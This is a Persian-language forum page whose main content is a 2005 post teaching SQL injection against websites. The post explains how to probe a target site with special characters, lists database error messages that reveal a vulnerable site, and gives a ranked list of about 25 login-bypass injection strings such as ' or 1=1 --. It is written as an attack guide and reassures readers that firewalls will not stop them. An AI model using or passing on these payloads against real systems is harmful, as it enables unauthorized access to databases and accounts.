Aftabgardan Cultural Center   Aftabgardan Forums ...Welcome پیام‌های خصوصی كنترل پنل             جستجو               پرسشهای متداول            .:: آخرین پست‌های انجمن ::.            لیست اعضا            مدیران سایت             درجات        ورود فهرست انجمن‌ها -> اينترنت -> مسائل مربوط به هكينگ و امنيت آموزش SQL Injection تاریخ: یکشنبه 17 مهر 1384 - 09:50     dell شروع فعاليت پست: 31 عضو شده در: 9 شهریور 1384 امتياز: 292 عنوان: آموزش SQL Injection Injection یا همون تزریق دستورات SQL که به نفوذگر امکان دسترسی به بانک اطلاعاتی را می دهد . چون این حملات روی پورت 80 صورت می گیرد نباید نگران فایروال باشید . اولین قدم برای حمله این است که بفهمیم سایت مورد نظرمان آسیب پذیر هست یا نه ؟ Login page Search Page FeedBack HTML pages use POST command to send parameters to another ASP page به طور کلی هر صفحه ای که اجازه ی چک کردن اطلاعات رو بده . اما همیشه نیاز به چک کردن اطلاعات نیست و کارمون با صفحه های (.jsp.cgi.php.asp) حل می شه که از آدرس زیر می شه استفاده کرد که به جای Site اسم سایت مورد نظر خودمون رو می نویسیم . http://site.com/index.asp?id=516 برای بررسی آسیب پذیری سایت راه های گوناگون وجود داره که متناسب با نوع سایت می باشد . استفاده از پارامتر های ویژه مانند : ‘ ; , “ % - * می باشد مانند زیر : در صفحه ی ورود یا پسورد یا آدرسهایی مپل آن می توان به صورت زیر عمل کرد : Login : user’ Pass : pass’ http://site.com/index.asp?id=’hack شاید مجبور بشویم که تغییراتی در مکان پارامتر ها بدهیم که این مربوط می شه به خودتون . اگر هم با این پارامتر ها جواب ندهد مجبور می شویم از ترکیبی از پارامترهای بالا استفاده کنیم که در طول آموزش توضیح خواهم داد . اگر بعد از وارد کردن پارامترهای ویژه با یکی از پیغام های زیر مواجه شدیم سایت آسیب پذیر است : 1.The page cannot be Displayed 2.There is a problem with the page you are trying to reach and it cannot be displayed. 3.ALL ODBC error messages 4.Microsoft OLE DB provider for ODBC drivers error …. 5.microsoft OLE DB provider for ODBC drivers error ‘80040e14’ 6.Microsoft JET Database Engine error ‘80040e14’ چگونگی استفاده از این پیغام ها را توضیح خواهم داد . خوب حالا چگونگی استفاده از Login page ها رو توضیح می دم . ما به یه Login page برخوردیم و هدف ما تنها عبور از این صفحه است . فرض می کنیم با استفاده از مطلب جلسه ی قبل به پیغام مورد نظر برخوردیم . با استفاده از ترکیبی از پارامتر های ویژه و جایگزینی آنها در فیلد های یوزر و پسورد و یا هر دو روش سعی کردیم و با خطا به راحتی با دور زدن Login page به صفخات مورد نظر می رسیم اما اون پارامتر های ویژه ی ترکیبی چی هست ؟ به ترتیب اهمیت و اولویت شامل زیر می باشد : ‘ or ‘ ‘=’ ‘ or ‘a’=’a ‘or’a’=’a admin’— admin’ or 1=1 – ‘ or 1=1 ‘ or 0=0 – admin” or “a”=”a admin” or 1=1 – admin’ or ‘a’=’a admin’) or (‘a’=’a or 0=0 – ‘ or 0=0 # hi’ or 1=1 – hi” or 1=1 – hi” or “a”=”a “) or (“a”=”a ‘) or (‘a’=’a “ or “a”=”a hi”) or (“a”=”a hi’) or (‘a’=’a “ or 0=0 # “ or 1=1— ‘) or (‘x’=’x تمامی این پارامتر ها تر کیبی کاملا تجربی است و بسته به اینکه شما با کدام یک از پارامترها ی ویژه به پیغام مورد نظر می رسید می تواند متفاوت باشد . • توجه داشته باشید که گاهی این پارامترها ی ترکیبی باید تنها در لاگین و یا پسورد یا در هر دو به کار رود . • با این روش می شود سرورهایی که تا 40% مشکل دارند رو دور زد . در مطالب بعدی روشهای کاملتری رو توضیح خواهم داد در ضمن منبع یادم نیست [ وضعيت كاربر: ]     تشکرها از این پست: نمایش پستها: تمام پستها1 روز7 روز2 هفته1 ماه3 ماه6 ماه1 سال قدیمی ترین در ابتداجدیدترین در ابتدا               مشاهده موضوع قبلی :: مشاهده موضوع بعدی     صفحه 1 از 1 تمام زمانها بر حسب GMT + 3.5 Hours می‌باشند  Related Topics   information    پرش به: انتخاب بخش اطلاعات مربوط به سایت----------------اطلاعیه‌های مربوط به سایت-- بحث‌های عمومی مربوط به سایت-- آفتابگردان در رسانه​ها محصولات و خدمات آفتابگردان----------------انجمن پشتیبانی تستا ۳ (قابل مشاهده برای اعضای VIP)-- انجمن عمومی تستا ۳ (همه کاربران می‌توانند سؤال مطرح کنند)انجمن پشتیبانی نمرا ۳ (قابل مشاهده برای اعضای VIP)انجمن پشتيباني پروژه سيستم برگزاري آزمون آنلاين «تستا»-- ماژول‌های تستاانجمن پشتیبانی پروژه نُمرا (سیستم اعلام آنلاین نمرات)انجمن تیم توسعه تستا و نمرا (قابل مشاهده برای اعضای تیم)انجمن پشتیبانی پروژه پارس‌خوان (ParsKhan)انجمن مربوط به سایت youRL.irانجمن پشتیبانی بوکفا (سیستم مدیریت آنلاین کتابخانه)انجمن نرم‌افزار کتاب‌خوان تدریجی دُردیگر محصولات و خدمات آفتابگردانفروشگاه مجازی سایتانجمن کلاس‌های آنلاین سایت-- دوره WebOnline1انجمن برنامه‌نویسان و طراحان آفتابگردانانجمن پشتیبانی مِلکا (سیستم مدیریت مشاور املاک)انجمن پشتیبانی لینکا ۳ (قابل مشاهده برای مشتریان این سیستم) به دور از رايانه----------------مباحث متفرقه-- انجمن ورزشي-- جوك و لطيفه و سرگرمي-- ماشین علمي-آموزشي، اجتماعي، فرهنگي-- انجمن مذهبي-- انجمن ادبي-- انجمن جوانان-- پزشكي - روانشناسي-- علم ریاضی-- انجمن پروژه ها و ابتکاراتفيلم و سینما، كليپ و آهنگآموزشگاه زبان سایت-- Let's learn english (آموزش و تقویت زبان انگلیسی)-- لنتعلم العربیة (زبان عربی)-- زبان ترکی انجمن دانشجويان و دانش آموزان----------------دانشگاه-- رشته کامپيوتر (تمام گرايش​ها)دبيرستانهنرستان و کار و دانش مقالات و آموزش‌هاي شما----------------مقالات و آموزش‌هاي شما كامپيوتر ----------------عمومي كامپيوتر-- سخت افزار-- بازي‌هاي رايانه‌اي و ساخت آن‌ها-- شبکه‌های کامپیوتری-- مجموعه آفيسسيستم عامل -- سيستم عامل Windows-- سيستم عامل Linuxبرنامه‌نويسي تحت وب-- زبان برنامه‌نويسي PHP-- زبان برنامه‌‌نويسي NET.-- تکنولوژي Ajaxعمومي برنامه‌نويسي-- زبان برنامه‌نويسي C و مشابه-- زبان برنامه‌نويسي Delphi-- ويژوال بيسيك VB-- انجمن سورس‌-- گرافيك در برنامه‌نويسي-- زبان Java , Java Script اينترنت-- مسائل مربوط به هكينگ و امنيت-- ياهو و مسائل مربوط به آنشرکت اپل (Apple)-- آیفون (iPhone)-- سیستم عامل‌های Mac OS و iOSبخریم یا نخریم؟مباحث مرتبط با انواع پایگاه داده‌ها  گرافيك كامپيوتري (دو بعدي)----------------مسائل عمومي مربوط به گرافيك دوبعدينرم‌افزارهاي مربوط به طراحي تصویر (گرافیک پیکسلی)-- گالري و نظرخواهينرم‌افزارهاي مربوط به طراحي وكتور (گرافيك برداري)مسائل عمومي مالتي مديا-- برنامه MultiMedia Builder-- برنامه Flash و نرم​افزارهاي وابسته هنر عكاسي و مباحث مربوط به آن----------------هنر عكاسي و مباحث مربوط به آن-- نمونه كارهاي شما گرافيك كامپيوتري (سه بعدي)----------------مسائل عمومي مربوط به گرافيك سه بعدي-- برنامه قدرتمند 3D Studio Max-- برنامه قدرتمند Maya طراحی سایت و وبلاگ----------------طراحي سايت‌هاي اينترنتي-- اصول طراحي صفحات وب-- طراحي وبلاگ و مسائل مربوط به آنسيستم‌هاي مديريت محتوي-- PHP Nuke-- Mambo/Joomla-- WordPress ميكس و مونتاژ----------------ميكس صوتي-- برنامه Adobe Audiotionمسائل عمومي مربوط به ميكس و مونتاژ-- برنامه قدرتمند Edius-- برنامه Adobe Premier-- برنامه Ulead Media Studio-- برنامه قدرتمند After Effects موبایل و مسائل مربوط به آن----------------موبایل و مسائل مربوط به آن-- Pocket PC & PDA فروم‌بلاگ | ForumBlog----------------فروم‌بلاگ‌هاي اعضا-- فروم‌بلاگ Hamid-- فروم‌بلاگ animeditor-- فروم​بلاگ Bahar-- فروم​بلاگ Ghodrat-- فروم‌بلاگ gtm396-- فروم‌بلاگ Sunny-- فروم‌بلاگ MGS-- فروم بلاگ kahroba-- فروم‌بلاگ glasy_heart-- فروم‌بلاگ ehadi-- فروم‌بلاگ yousefgharibi-- فروم‌بلاگ moloud-- فروم‌بلاگ mahnazSALASفروم‌بلاگ agro  شما نمی توانید در این بخش موضوع جدید پست کنید شما نمی توانید در این بخش به موضوعها پاسخ دهید شما نمی توانید موضوع های خودتان را در این بخش ویرایش کنید شما نمی توانید موضوع های خودتان را در این بخش حذف کنید شما نمی توانید در این بخش رای دهید